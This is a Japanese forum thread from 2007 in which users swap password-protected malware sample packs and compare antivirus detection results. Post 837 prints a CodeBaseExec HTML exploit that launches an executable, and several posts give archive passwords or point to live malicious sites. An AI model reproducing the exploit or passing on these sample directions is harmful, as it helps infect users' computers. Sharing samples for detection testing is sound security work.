827:名無しさん@お腹いっぱい。
07/09/15 23:23:33
カスペは評判だけが先行して、
実は売れてないとか?
828:名無しさん@お腹いっぱい。
07/09/16 00:24:21
>>827
Amazonランキング見てみな
829:名無しさん@お腹いっぱい。
07/09/16 01:14:14
>>827
なんか中国でシェアNo1になるかもしれん勢いなんだとさ
知ったこっちゃねーがw
元々ゴミみたいなアンチウイルスがシェア上位を牛耳ってただけだしなw
830:名無しさん@お腹いっぱい。
07/09/16 09:27:55
またNOD厨か
831:名無しさん@お腹いっぱい。
07/09/16 09:53:51
>>829
中国のソフトウェア市場は9割が海賊版
832:名無しさん@お腹いっぱい。
07/09/16 12:26:31
URLリンク(www5.uploader.jp)
pass : folder
中身は .folderファイル
833:名無しさん@お腹いっぱい。
07/09/16 12:59:55
>>832
カス7
Exploit.HTML.CodeBaseExec
834:名無しさん@お腹いっぱい。
07/09/16 17:57:49
カス厨自演乙
835:名無しさん@お腹いっぱい。
07/09/16 18:38:12
>>832
McAfeeスルーヽ(`Д´)ノ
836:名無しさん@お腹いっぱい。
07/09/16 18:46:37
>>835
___
/ ヽ
, -‐ (_).⌒ l ̄| ⌒ | プギャーーー
l_j_j_j と) ノ─| ノ
/ / ヽ
〈 ノ |
837:名無しさん@お腹いっぱい。
07/09/16 18:52:58
>>832
これの中身って
<html><head><title></title>
<object CLASSID='CLSID:4455A55A-5FF7-42A0-94C4-CEAD0F76F6F5' CODEBASE='img001.txt.exe'></object>
<script>window.location = "./";</script></head><body></body></html>
ってゆうhtmlみたいなんだけど、これってどんな実害あるの?
838:名無しさん@お腹いっぱい。
07/09/16 19:01:04
>>832
F-Secure2008
Exploit.HTML.CodeBaseExec
839:837
07/09/16 19:02:38
>>832
アンカーミスった。。。
つまりローカルだと「img001.txt.exe」ってゆうウィルス実体?ファイルが存在しないのに、
このhtmlをトロイダウンローダーとかって判定するのってなんかむちゃくちゃな気が。。。
潜在的に危険なhtmlってこと?おれなんか大きな勘違いしてる?
840:名無しさん@お腹いっぱい。
07/09/16 19:24:33
>>832
URLリンク(www.virustotal.com)
File virus.folder received on 09.16.2007 12:16:29 (CET)
Result: 5/32 (15.63%)
ClamAV 0.91.2 2007.09.16 Trojan.Downloader.HTML.Codebase-1
Fortinet 3.11.0.0 2007.09.16 HTML/CodeBaseExec.A!exploit
F-Secure 6.70.13030.0 2007.09.15 Exploit.HTML.CodeBaseExec
Ikarus T3.1.1.12 2007.09.16 Exploit.HTML.CodeBaseExec
Kaspersky 4.0.2.24 2007.09.16 Exploit.HTML.CodeBaseExec
File size: 192 bytes
MD5: 3f66c020cda211770342071272571f1b
SHA1: de341e53a7ba3cf1e4e961aa77b63e63be12f470
841:名無しさん@お腹いっぱい。
07/09/16 20:40:16
>>832
ノートン
\virus.folder This file is not malicious by itself. However, it may be used by a malicious program.
842:名無しさん@お腹いっぱい。
07/09/16 20:46:53
これじゃねえの?
URLリンク(www.trendmicro.co.jp)
843:名無しさん@お腹いっぱい。
07/09/16 21:06:24
783 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/09/16(日) 21:01:42
Norton2002とAntivirが同等の検出力とか言ってる人。
下のスレを一ヶ月以上チェックして詳細な報告レポートを作ってくれ。
Antivirスレで場違いなノートンの宣伝をするのなら、これくらいのことはしてもらいたい。
【気違い】検出可否報告スレ3【禁止】
スレリンク(sec板)
844:名無しさん@お腹いっぱい。
07/09/16 21:10:23
一部のマルウェアの検出可否だけで判断するのは危険
AV ComparativesやVirus Bulletinのレポートを読む方が正確
845:名無しさん@お腹いっぱい。
07/09/16 21:19:20
つーことは二流三流のマルウェアにはノートン役立たずってことか
ストライクゾーン狭いんだな
846:名無しさん@お腹いっぱい。
07/09/16 21:23:06
>>845
ワールドワイドで確認されてるマルウェアが対象なんだから
ストライクゾーンは広すぎるくらい
馬鹿かお前はw
847:名無しさん@お腹いっぱい。
07/09/16 21:31:23
ということは
ワールドワイドの土俵の外はからっきし確定じゃん
井の中の蛙ストライクゾーンなんだね
848:名無しさん@お腹いっぱい。
07/09/16 21:51:30
確かにそうだな
少なくとも俺のワールドワイドは一般のワールドワイド+このスレだしな
849:名無しさん@お腹いっぱい。
07/09/16 22:18:23
某ワールドワイド君のワールドワイドは向こう三軒両隣程度という見解でよさそうだw
850:名無しさん@お腹いっぱい。
07/09/16 22:28:42
井の中の蛙ってw
Winnyにしか興味のない奴こそ
井の中の蛙、大海を知らずというべきだろw
851:↑ブツのネタ元知ってるみたいだYO www
07/09/16 22:37:09
そうなんだ知らなかったよ いやぁ 失敬失敬
852:名無しさん@お腹いっぱい。
07/09/16 22:43:39
問うに落ちず語るに落ちるw
853:名無しさん@お腹いっぱい。
07/09/16 22:45:32
AV ComparativesやVirus Bulletin引き合いに出したあげくが
ただの乞食かよw
854:名無しさん@お腹いっぱい。
07/09/16 22:46:30
なんかいつの間にかすごい勢いでwinny君は李下で冠を正してますな
855:名無しさん@お腹いっぱい。
07/09/16 23:47:10
>>852-854
なんか乞食が顔真っ赤にしてるな
856:↑
07/09/16 23:56:06
AV ComparativesやVirus Bulletinが大好きな乞食
857:↑もしかして長考1時間
07/09/16 23:57:19
.
858:名無しさん@お腹いっぱい。
07/09/16 23:59:03
>>856
おい 先に矢印使うなよ(^^;
859:↑
07/09/16 23:59:05
AV ComparativesやVirus Bulletinが大好きな乞食
860:859
07/09/17 00:03:56
>>858
レスタイミング悪すぎたな グダグダやw
861:名無しさん@お腹いっぱい。
07/09/17 00:04:14
(^^;オレ流れ弾に撃たれてる気がするw
862:名無しさん@お腹いっぱい。
07/09/17 00:18:22
AV ComparativesやVirus Bulletinが大好きな乞食のせいだな。
863:名無しさん@お腹いっぱい。
07/09/17 00:42:24
>>832
VB2007
スルー。検体送信済み
864:名無しさん@お腹いっぱい。
07/09/17 01:02:10
>>832
Antivirスルー(;´Д`)
865:名無しさん@お腹いっぱい。
07/09/17 06:10:43
>832
乙です!!
NOD32未検出。
提出しておきました。
866:名無しさん@お腹いっぱい。
07/09/17 21:16:50
>>832
AntiVir検出
Exp/HTML.CodeBaseExec.61
867:名無しさん@お腹いっぱい。
07/09/18 19:10:39
URLリンク(www5.uploader.jp)
Pass: Malware-Pack
いろいろ詰め合わせ
McAfeeには提出済み
868:名無しさん@お腹いっぱい。
07/09/18 19:23:52
>>867
乙です
Norton Internet Security 2008
2体検出/12ファイル
1.vbs : W32.SillyFDC
ad.htm : Downloader
残りは贈っておきます
869:名無しさん@お腹いっぱい。
07/09/18 19:41:04
>>867
ウイルスキラー
4\qq.htm
Trojan.DL.Script.JS.Agent.aa
5\ad.htm
Trojan.DL.Script.JS.Agent.lhf
9\cthaninkey.CAB>>MSINET.OCX
Trojan.PSW.Win32.LMir.yff
b\prviacy
Trojan.DL.Script.JS.Agent.af
870:名無しさん@お腹いっぱい。
07/09/18 19:53:39
チンカスペ
0\index.htm : JS.Agent.nv
4\qq.htm : HTML.Small.h
5\ad.htm : JS.Psyme.kf
残りは送る気毛頭ありません
871:名無しさん@お腹いっぱい。
07/09/18 22:35:27
>>867
ウイルスバスター2007
qq.htm JS_DLOADER.TTZ
他スルーなので検体提出
872:名無しさん@お腹いっぱい。
07/09/18 23:23:28
>>867
AVG
0\INDEX.HTM
Virus found JS/Downloader.Agent
6\INDEX.HTM
Virus found JS/Downloader.Agent
7\WMV.HTM
Virus found JS/Downloader.Agent
8\JB.EXE
Trojan horse Generic3.TJI
C\1.VBS
Virus found VBS/Nadix
残りはスルーしたので検体送りました
873:名無しさん@お腹いっぱい。
07/09/19 01:31:31
>>867
カスペ7
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
これから検体提出
874:名無しさん@お腹いっぱい。
07/09/19 02:07:28
>>867
Avira AntiVir PersonalEdition Classic
VDF version internet: 6.39.1.147
--> Malware/4/qq.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Dldr.Nomo.1
--> Malware/5/ad.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
--> Malware/6/index.htm
[DETECTION] Contains detection pattern of the HTML script virus HTML/ADODB.Exploit.Gen
--> Malware/b/prviacy
[DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Agent.AA
う~ん
875:名無しさん@お腹いっぱい。
07/09/19 08:38:51
>>867
AVG IS
0 Virus found JS/Downloader.Agent
6 Virus found JS/Downloader.Agent
7 Virus found JS/Downloader.Agent
8 Trojan horse Generic3.TJI
b Not-A-Virus.Exploit.HTML.Mht
c Virus found VBS/Nadix
876:869
07/09/19 11:43:45
9\cthaninkey.CAB>>MSINET.OCX
誤検出でした
877:873
07/09/19 12:11:00
>>867
カスペ7
0と7は追加検出。カスペ判断ではゴミ多い。
detected: Trojan program Trojan-Downloader.JS.Agent.nv File: tane_uljp00133.zip/Malware/0/index.htm
detected: Trojan program Trojan-Downloader.HTML.Small.h File: tane_uljp00133.zip/Malware/4/qq.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.kf File: tane_uljp00133.zip/Malware/5/ad.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.no File: tane_uljp00133.zip/Malware/6/index.htm
detected: Trojan program Trojan-Downloader.JS.Agent.qj File: tane_uljp00133.zip/Malware/7/wmv.htm
detected: Trojan program Trojan-Downloader.VBS.Agent.dz File: tane_uljp00133.zip/Malware/b/prviacy
detected: Trojan program Trojan-Downloader.VBS.Psyme.it File: tane_uljp00133.zip/Malware/c/1.vbs
以下のファイルは、
No malicious software was found in the attached file.
1 ceshi,exe
2 errclean.exe
3 Setup.,exe
8.Jb.exe
9. cthaninkey.cab
a adnuke35.exe
878:名無しさん@お腹いっぱい。
07/09/19 13:15:11
カスペ
879:名無しさん@お腹いっぱい。
07/09/19 19:45:08
Stoned.Angelina
URLリンク(sunbeltblog.blogspot.com)
880:名無しさん@お腹いっぱい。
07/09/19 19:57:18
現代のウイルス対策ソフト、過去のウイルスに対処できず
URLリンク(www.itmedia.co.jp)
正常に検出および削除ができたソフト
G Data (AVK) Total Care 2008
BitDefender Internet Security 2008 (v10)
Kaspersky Internet Security 7.0
検出できたが削除はできなかったソフト
BullGuard Internet Security 7.0
McAfee Internet Security 2007
Trend Micro PC-cillin Internet Security 2007
(ウイルスバスター 2007)
Avira AntiVir Personal Premium (v7)
検出および削除はできたが、その後 OS が起動できなくなってしまったソフト
Symantec Norton 360
Panda Internet Security 2008 (v12)
検出できなかったソフト
Microsoft OneCare 1.6
881:名無しさん@お腹いっぱい。
07/09/20 00:57:32
Microsoft OneCareの存在意義を問いただしたい
882:名無しさん@お腹いっぱい。
07/09/20 01:58:41
URLリンク(www5.uploader.jp)
pass: msn
Messenger経由系(Live?)
ロンドン在住の友人よりこんにちわ
883:名無しさん@お腹いっぱい。
07/09/20 02:19:43
>>882
URLリンク(www.virustotal.com)
File IMG09-18.jpeg-www.photoupload.com received on 09.19.2007 19:00:49 (CET)
Result: 11/32 (34.38%)
AntiVir 7.6.0.15 2007.09.19 Worm/LamerDetect.A
AVG 7.5.0.485 2007.09.19 Obfustat.PIZ
BitDefender 7.2 2007.09.19 Trojan.Agent.AFGC
CAT-QuickHeal 9.00 2007.09.19 I-Worm.LamerDetect.a
F-Secure 6.70.13030.0 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Ikarus T3.1.1.12 2007.09.19 Trojan-PWS.Win32.LdPinch.FI
Kaspersky 4.0.2.24 2007.09.19 P2P-Worm.Win32.LamerDetect.a
Prevx1 V2 2007.09.19 Worm.Ircbot.Gen
Sunbelt 2.2.907.0 2007.09.19 VIPRE.Suspicious
TheHacker 6.2.5.062 2007.09.19 W32/LamerDetect.a
Webwasher-Gateway 6.0.1 2007.09.19 Worm.LamerDetect.A
File size: 29429 bytes
MD5: 8aefba0f7dc85ef4ac95378388fae724
SHA1: 8b0475b1284a3d0bf385c8e6126083fafc0d4017
packers: PECRYPT
Prevx info: URLリンク(fileinfo.prevx.com)
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
884:名無しさん@お腹いっぱい。
07/09/20 03:18:55
>>882
ウイルスバスター 2007(CPR)スルー
検体提出しました
885:名無しさん@お腹いっぱい。
07/09/20 07:53:13
NOD32だめだな。
886:名無しさん@お腹いっぱい。
07/09/20 08:11:04
>882
オツカレさま!!!
avast!検出せず・・・
提出しました。
887:名無しさん@お腹いっぱい。
07/09/20 09:16:36
>>882
AVG IS
Virus identified Obfustat.PIZ 検出
888:名無しさん@お腹いっぱい。
07/09/20 09:49:43
>>882
McAfeeスルーヽ(`Д´)ノ
889:名無しさん@お腹いっぱい。
07/09/20 14:55:37
>>882
bitdefender一個検出
890:名無しさん@お腹いっぱい。
07/09/20 16:48:38
>>882
乙です
Norton Internet Security 2008 反応無し
Symantecへ贈っておきました
891:名無しさん@お腹いっぱい。
07/09/20 20:47:46
>>882
ノートン対応
\IMG09-18.jpeg-www.photoupload.com
コンピュータ:
結果: このファイルの検出結果 W32.Spybot.Worm. URLリンク(www.symantec.com)
892:名無しさん@お腹いっぱい。
07/09/20 21:27:47
Kazaa板キンタマってとこか
BOT機能あるからP2P以外でも利用する意味があるわけね。
893:名無しさん@お腹いっぱい。
07/09/22 13:58:03
URLリンク(www5.uploader.jp)
Pass: Malware-Pack3
いろいろ詰め合わせ
McAfeeには提出済み
894:名無しさん@お腹いっぱい。
07/09/22 14:18:59
>>393
2\JsT.js : JS_AGENT.UHI
6\sina.htm : TROJ_Generic
9\sys614.htm : JS_DLOADER.PUX
b\soft.exe : TROJ_DLOADER.QDI
残りは送付済み
895:894
07/09/22 14:19:46
>>894
はウイルスバスター2007です。
896:名無しさん@お腹いっぱい。
07/09/22 15:15:36
あらら、virustotalからSymantecが無くなってるる。。。
>>893
ノートン反応
\b\soft.exe は Downloader ウィルスに感染しています。
無反応分、シマンテックに検体送付しました。
897:名無しさん@お腹いっぱい。
07/09/22 17:28:04
カスペ7
0 Trojan-Downloader.VBS.Agent.eg
1 Trojan-Downloader.VBS.Agent.ef
2 Trojan-Downloader.VBS.Agent.ee
4 Trojan-Downloader.VBS.Agent.eh
5 Trojan-Downloader.VBS.Agent.ed
6 Trojan-Downloader.VBS.Agent.ec
7 Trojan-Downloader.JS.Agent.rd
8 Trojan-Downloader.JS.Agent.nv
8 Trojan-Downloader.JS.Psyme.nv
c Trojan-Downloader.JS.Agent.rc
898:名無しさん@お腹いっぱい。
07/09/22 18:32:03
>>893
897を訂正すると、
×8 Trojan-Downloader.JS.Psyme.nv
○9 Trojan-Downloader.JS.Psyme.nv
の誤り
b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
未検知分は、検体提出。
899:名無しさん@お腹いっぱい。
07/09/22 20:45:54
>>893
まいど乙
AVIRA Antivir PEC
検出分
0\index.htm: HEUR/Exploit.HTML
1.htm: HEUR/Exploit.HTML
4\flash.js: HEUR/Exploit.HTML
5\index.htm: HEUR/Exploit.HTML
6\sina.htm: HTML/Dldr.Sina
9\sys614.htm: EXP/WMPload.A
b\soft.exe: TR/Dldr.Versie.1
未検出分送致スミ
900:名無しさん@お腹いっぱい。
07/09/22 21:02:38
>>893
ウイルスキラー
1\1.htm
Trojan.DL.VBS.Small.ez
5\index.htm
Trojan.DL.VBS.Agent.xhd
6\sina.htm
Trojan.DL.VBS.Agent.xfq
901:898
07/09/22 22:22:29
3について、白の返事
Hello,
s_14_0
No malicious code was found in this file.
Please quote all when answering.
bについてシグネチャに変更
Trojan program Trojan-Downloader.Win32.Delf.cex
902:名無しさん@お腹いっぱい。
07/09/22 23:49:29
>>893
AVG IS
0 Downloader.Agent.m
4 Virus found JS/Downloader.Agent
5 Downloader.Agent.m
6 Downloader.Small.dk
8 Virus found JS/Downloader.Agent
b Trojan horse Generic7.QVB
c Virus found JS/Downloader.Agent
903:名無しさん@お腹いっぱい。
07/09/23 12:57:32
キング
malware\b\soft.exe
Win32.Troj.OnLineGames.sj.37888
904:名無しさん@お腹いっぱい。
07/09/23 14:02:20
KINGやるぅ~
905:名無しさん@お腹いっぱい。
07/09/23 14:16:28
>>898
>b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
カスペ7 ヒューリスティックちゃんと動作するんだな
積極的な効き味ではないみたいだけど・・・
堅実な方向に振っているな
906:名無しさん@お腹いっぱい。
07/09/23 14:29:31
カスペ厨必死だねw
907:名無しさん@お腹いっぱい。
07/09/23 14:35:08
s_14_0を獄窓につっこんでも?としか表示されない
ヘッダを見ると.exeらしいんだが どういうこと?
908:名無しさん@お腹いっぱい。
07/09/23 15:50:21
URLリンク(zero.bestmanage3.org)
pass:virus
909:名無しさん@お腹いっぱい。
07/09/23 16:07:27
>>908
踏んだらカスペが鳴きっぱなしだった
910:名無しさん@お腹いっぱい。
07/09/23 16:12:30
>>908
ノートン・ファイター大激怒
911:名無しさん@お腹いっぱい。
07/09/23 16:15:45
>>908
URLリンク(85.255.116.234)
ここに飛ばされるね
ちょっとびっくりした
URLリンク(so.7walker.net)
912:名無しさん@お腹いっぱい。
07/09/23 16:31:46
これかぁ
営業企画お尻に火がついた戦士ノートン・ファイター
URLリンク(news.google.com)
913:名無しさん@お腹いっぱい。
07/09/23 16:42:42
ノートン・ファイター
URLリンク(internet.watch.impress.co.jp)
914:名無しさん@お腹いっぱい。
07/09/23 16:52:08
>>908
inhoster.com
915:名無しさん@お腹いっぱい。
07/09/23 17:08:56
URLリンク(www.dotup.org)
virus
ノートン送付済み
916:名無しさん@お腹いっぱい。
07/09/23 17:12:48
inst.exe
おちんぽ!!!!!おちんぽ!!!!!!!!!!
うせろ。
917:名無しさん@お腹いっぱい。
07/09/23 17:16:11
>>915
バスタースルー
918:名無しさん@お腹いっぱい。
07/09/23 17:23:52
Microsoft 1.2803 2007.09.23 password protected
NOD32v2 2545 2007.09.23 the file is probably password protected.
パスワードなんて掛かってないのに・・・・2つだけおバカメッセージを出した以外は無反応かあ。
919:名無しさん@お腹いっぱい。
07/09/23 17:26:05
新種か
カスペに送っておきます
920:名無しさん@お腹いっぱい。
07/09/23 17:29:10
>>915
㌧。
カスペ7 スルー
VTでも反応しないみたいだがだが。
921:918
07/09/23 17:29:22
すまん、バカは俺だった。いってくる・・・・
922:名無しさん@お腹いっぱい。
07/09/23 18:29:45
>>893
Risingより
1.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lht
2.文件名:JsT.js
病毒名:Trojan.DL.Script.JS.Agent.lhx
3.文件名:s_14_0
不是病毒
4.文件名:flash.js
病毒名:Trojan.DL.Script.JS.Agent.lhy
5.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lhw
6.文件名:bodg.htm
病毒名:Trojan.DL.Script.JS.Agent.lhv
7.文件名:sys614.htm
病毒名:Trojan.DL.Script.JS.Agent.a
8.文件名:Pic368.gif
不是病毒
9.文件名:soft.exe
病毒名:Trojan.DL.Win32.Autorun.ytd
10.文件名:smss.htm
病毒名:Trojan.DL.Script.JS.Agent.lhu
>>915
キラースルー
923:名無しさん@お腹いっぱい。
07/09/23 18:40:56
>>915
AVGスルー
924:名無しさん@お腹いっぱい。
07/09/23 18:42:13
>>915
McAfeeもいつも通りスルー
925:名無しさん@お腹いっぱい。
07/09/23 18:42:29
>>915
カスペから反応来た
>No malicious code was found in this file.
>Please quote all when answering.
926:名無しさん@お腹いっぱい。
07/09/23 19:39:54
NOD32スルー
927:名無しさん@お腹いっぱい。
07/09/23 20:08:20
>>915
AntiVir スルー
928:名無しさん@お腹いっぱい。
07/09/23 20:12:27
>>908
ZoneAlarmPROアンチスパイウェアが、サイトに接続をブロック
929:名無しさん@お腹いっぱい。
07/09/23 20:24:32
>>908
キングじゃ怖くて踏めません
930:名無しさん@お腹いっぱい。
07/09/23 20:49:38
>>908
馬鹿野郎!zipだと安心してリカバリ完了後の穴だらけPCで
踏んじゃったジャマイカ!
931:930
07/09/23 20:51:31
案の定変なプロセス動いてますた('・ω・)
932:名無しさん@お腹いっぱい。
07/09/23 20:59:37
怒った後、急に静かに… カワイソスw
933:930
07/09/23 21:12:45
あやしいファイルひとまとめにして検体にします(・ω・)ノ
from 第二号機PC
934:930
07/09/23 22:20:22
駆除作業完了!って思った矢先これですか・・・('・ω・)
URLリンク(www.dotup.org)
935:930
07/09/23 22:26:19
ダウソパス sec
zipパス fuzakenji
URLリンク(www.dotup.org)
もうリカバリします('・ω・)
936:名無しさん@お腹いっぱい。
07/09/23 22:53:33
>>915
あほかっ!!!
ただのテキストファイルだろーが。
937:八頭
07/09/23 22:57:10
YouTube - Cheap Trick
URLリンク(www.youtube.com)
938:名無しさん@お腹いっぱい。
07/09/23 22:59:44
嗚呼、916が見えないw
939:名無しさん@お腹いっぱい。
07/09/23 23:01:16
>>915
>>936確認
釣られた。。。
>>916
見落としてたよ
940:名無しさん@お腹いっぱい。
07/09/24 12:55:06
>>935
[!] ファイルがありません
www.dotup.org2686.jpg----./uploda/www.dotup.org2686.jpg_/www.dot... ファイルが存在しません。
941:名無しさん@お腹いっぱい。
07/09/24 16:16:40
>>908
キングで反応あり
RISK.Exploit.Ani
942:名無しさん@お腹いっぱい。
07/09/24 18:48:14
Is the Wildlist still relevant?
URLリンク(www.sophos.com)
今更w
943:名無しさん@お腹いっぱい。
07/09/25 07:42:31
URLリンク(www.perfect-av.com)
本日の動画!!をクリックして反応有ればAVが正常だと思うんだけど
どう?
944:名無しさん@お腹いっぱい。
07/09/25 08:13:40
Avira AntiVir PersonalEdition Classic
--> PerfectAV.exe
[DETECTION] Is the Trojan horse TR/VB.awc.14
PerfectAV.exeがDLされてくるけど、途中で反応した
945:名無しさん@お腹いっぱい。
07/09/25 08:20:24
>>943
マカフィー
検出:PWS-Hachilem
946:名無しさん@お腹いっぱい。
07/09/25 08:42:30
>>943
キング反応なし
947:名無しさん@お腹いっぱい。
07/09/25 08:43:34
>>943
EsetSmartSecurityのβ版
反応なし
948:名無しさん@お腹いっぱい。
07/09/25 09:08:39
>>943
ウイルスキラー
Trojan.PSW.VB.ado
949:名無しさん@お腹いっぱい。
07/09/25 11:50:04
>>943
Norton Internet Security 2008
Trojan.Hachilem!gen として検出
950:名無しさん@お腹いっぱい。
07/09/25 12:09:16
>>943
ウイルスバスター2007
TSPY_VB.DTV
951:名無しさん@お腹いっぱい。
07/09/25 17:46:35
>>943
avast! 4.7 Home Edition
Win32:VB-ERE [Trj]
952:名無しさん@お腹いっぱい。
07/09/25 20:09:23
>>943
カスペ7 Web-AV
detected: Trojan program Trojan.Win32.VB.awc URL: URLリンク(www.perfect-av.com)
ちんぽは反応せず。
953:名無しさん@お腹いっぱい。
07/09/25 20:42:34
直リン貼るなボケ
954:名無しさん@お腹いっぱい。
07/09/25 21:52:24
>>943 PerfectAV.exe URLリンク(www.virustotal.com)
AhnLab-V3 2007.9.22.0 2007.09.24 Win-Trojan/Xema.variant
AntiVir 7.6.0.15 2007.09.25 TR/PSW.VB.KB.17
Authentium 4.93.8 2007.09.25 W32/PWStealer.KEN
Avast 4.7.1043.0 2007.09.24 Win32:Trojan-gen. {VB}
AVG 7.5.0.485 2007.09.25 PSW.Generic4.JOG
BitDefender 7.2 2007.09.25 Trojan.Pws.Vb.KB
ClamAV 0.91.2 2007.09.25 Trojan.Spy-7188
DrWeb 4.33 2007.09.25 BackDoor.Generic.1485
eSafe 7.0.15.0 2007.09.23 Win32.VB.kb
Ewido 4.0 2007.09.24 Trojan.VB.kb
Fortinet 3.11.0.0 2007.09.25 W32/VB.KB!tr.pws
F-Prot 4.3.2.48 2007.09.25 W32/PWStealer.KEN
F-Secure 6.70.13030.0 2007.09.25 Trojan-PSW.Win32.VB.kb
Ikarus T3.1.1.12 2007.09.25 Trojan.Win32.VB.awc
Kaspersky 4.0.2.24 2007.09.25 Trojan-PSW.Win32.VB.kb
McAfee 5126 2007.09.24 PWS-Hachilem
Microsoft 1.2803 2007.09.25 PWS:Win32/VB!2DD2
NOD32v2 2549 2007.09.25 probably a variant of Win32/PSW.VB.FS
Norman 5.80.02 2007.09.25 W32/VBTroj.GLS
Panda 9.0.0.4 2007.09.25 Suspicious file
Rising 19.42.11.00 2007.09.25 Trojan.PSW.VB.ado
Sophos 4.21.0 2007.09.25 Mal/Generic-A
Sunbelt 2.2.907.0 2007.09.25 Trojan.Hachilem!gen
Symantec 10 2007.09.25 Trojan.Hachilem!gen
TheHacker 6.2.5.068 2007.09.25 Trojan/PSW.VB.kb
VBA32 3.12.2.4 2007.09.25 Trojan-PSW.Win32.VB.kb
VirusBuster 4.3.26:9 2007.09.24 Trojan.PWS.VB.FBV
Webwasher-Gateway 6.0.1 2007.09.25 Trojan.PSW.VB.KB.17
File size: 360448 bytes MD5: d22d964eec6dcb52e77f9c41cec9b4e3 SHA1: 016df57660879197ae3532491f23313779b59bc0
Result: 28/32 (87.5%) スルー CAT-QuickHeal eTrust-Vet FileAdvisor Prevx1
>>946 キングに送っておいた。
955:名無しさん@お腹いっぱい。
07/09/25 23:36:03
>>943
NOD32なんだけど、ふつーにDLできちゃうしデスクトップ上の
「PerfectAV.exe」を選択して右クリックからスキャンしても無反応。。。なんで?
virustotal.comでは対応済になってるみたいだけど。
BitDefender v10でも同様に無反応。
AVGでは検出&削除できるからDLミスってこともない。
956:名無しさん@お腹いっぱい。
07/09/25 23:57:02
NODはよく知らないがヒューリスティックで検知してるみたいだから
ヒューリスティックの設定がわるいんじゃないか?
957:名無しさん@お腹いっぱい。
07/09/26 00:53:44
>>955
アップデートしてないんじゃない?
朝の時点ではBitDefenderとNODは対応してなかった
958:名無しさん@お腹いっぱい。
07/09/26 03:03:45
ワロタ
959:名無しさん@お腹いっぱい。
07/09/26 06:19:50
■■■■■■○○○○○○○○○○○○○○○
■○○○○■○■■■■■○○○■■■■■○
■○○○○■○■○○○■○○○○○○○■○
■○○○○■○■○○○■○○○○○○■○○
■○○○○■○■○○○■○○○○○○■○○
○○○○■○○■○○○■○○○○○■○○○
○○○○■○○■○○○■○○○○○■■○○
○○○■○○○■○○○■○○○○■○○■○
○○○■○○○■■■■■○○○■○○○○■
○○■○○○○■○○○■○○■○○○○○○
○○○○○○○○○○○○○○○○○○○○○
○○○○○○○○○○○○○○○○○○○○○
960:名無しさん@お腹いっぱい。
07/09/26 09:45:28
URLリンク(www5.uploader.jp)
pass: Malware-Pack4
いろいろ詰め合わせ
McAfeeには提出済み
961:名無しさん@お腹いっぱい。
07/09/26 10:41:03
>>960
Avira AntiVir V7.00.00.14
1.js
121.exe
gmsex.exe
spb40.exe
tool.js
上記未検出につき提出済み。
962:名無しさん@お腹いっぱい。
07/09/26 11:01:37
Avira 一応
--> malware\0\51-70.pif
[DETECTION] Contains detection pattern of the HEUR-DBLEXT/Crypted virus
--> malware\1\setup.exe
[DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.dsx.243 Backdoor server programs
--> malware\3\mminstall.exe
[DETECTION] Is the Trojan horse TR/Spy.Banker.TW.116
--> malware\4\bf.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Agent.EP
--> malware\5\ysydown.cab
[1] Archive type: CAB (Microsoft)
--> ysydown.exe
[DETECTION] Contains detection pattern of the dropper DR/Drop.Agent.amm.100
--> malware\6\player.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
--> malware\7\vip.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
963:名無しさん@お腹いっぱい。
07/09/26 11:05:08
>>960
avast!(´;ω;`)シクシク
URLリンク(nekomimi.ws)
964:名無しさん@お腹いっぱい。
07/09/26 11:24:49
>>963
ウンコ発見
965:名無しさん@お腹いっぱい。
07/09/26 12:01:01
>>960
㌧
カスペ7
8/12 (5,6はヒューリスティック)
検体提出
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dij File:0/51-70.pif//PE_Patch.PECompact//PecBundle//PECompact
detected: malware not-virus:Hoax.Win32.Avola.a File:1/setup.exe//PE_Patch.UPX//UPX
detected: Trojan program Trojan-Downloader.Win32.Agent.dlv File:3/mminstall.exe
detected: virus Heur.Invader (modification) File:5/ysydown.cab/ysydown.exe//ASPack
detected: virus Heur.Downloader (modification) File:6/player.exe//PE_Patch.UPX
detected: Trojan program Trojan-Spy.Win32.Agent.abv File:7/vip.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dor File:8/gmsex.exe
detected: Trojan program Trojan-Downloader.JS.Agent.oq File:9/1.js//JSPack
966:名無しさん@お腹いっぱい。
07/09/26 12:23:07
>>960
AVG Anti-Malware
0\51-70.PIF
Trojan horse PSW.Lineage.AAV
1\setup.exe
Trojan horse SHeur.OGX
2\121.exe
Trojan horse Downloader.Generic6.HYO
3\MMINSTALL.EXE
Trojan horse Generic7.UAP
4\bf.htm
Downloader.Agent.fm
5\ysydown.cab
Trojan horse Downloader.Generic6.JJH
6\PLAYER.EXE
Trojan horse Generic8.AAX
7\VIP.EXE
Trojan horse Generic7.ZMC
8\GMSEX.EXE
Trojan horse Generic7.ZMG
9 a bはスルーしたので送ります
967:名無しさん@お腹いっぱい。
07/09/26 12:30:17
AVGすげー
968:名無しさん@お腹いっぱい。
07/09/26 12:33:58
>>960乙です
Norton Internet Security 2008
/1/setup.exeを Awola として検出
/2/121.exe Downloader として検出
